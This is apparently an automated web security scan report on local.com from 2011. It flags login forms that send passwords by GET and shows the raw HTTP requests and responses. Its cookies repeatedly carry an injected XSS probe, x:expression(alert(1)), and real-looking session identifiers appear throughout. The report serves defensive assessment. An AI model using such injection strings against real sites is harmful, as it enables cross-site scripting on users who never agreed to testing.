Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 46766
Date: Thu, 03 Feb 2011 16:50:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:14 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=food; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 46766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4. Password field submitted using GET method  previous  next
There are 30 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


4.1. http://www.local.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28061
Date: Thu, 03 Feb 2011 16:50:12 GMT
Content-Length: 28061
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:12 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.2. http://www.local.com/business/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 77820
Date: Thu, 03 Feb 2011 16:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Business+Home|home|%2fbusiness%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 77820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/details/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 116008
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:01 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=local.com; expires=Thu, 03-Feb-2011 16:31:01 GMT; path=/
Content-Length: 116008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/details/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 91928
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186474914335; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 91928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/details/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 115967
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 115967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/details/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116644
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186602212783; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/details/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116910
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186605902360; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
